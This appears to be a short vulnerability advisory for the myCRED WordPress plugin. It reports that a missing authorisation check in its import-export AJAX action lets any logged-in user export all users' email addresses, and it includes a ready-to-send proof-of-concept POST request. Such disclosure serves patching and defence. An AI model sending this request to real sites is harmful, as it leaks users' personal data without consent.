The plugin does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Cookie: [any authenticated user] action=mycred-tools-import-export&request_tab=points&request=export&template=raw&user_field=email&types=%5B%22mycred_default%22%5D
David Hamann
David Hamann
Yes
2022-03-29 (about 3 months ago)
2022-03-29 (about 3 months ago)
2022-04-11 (about 2 months ago)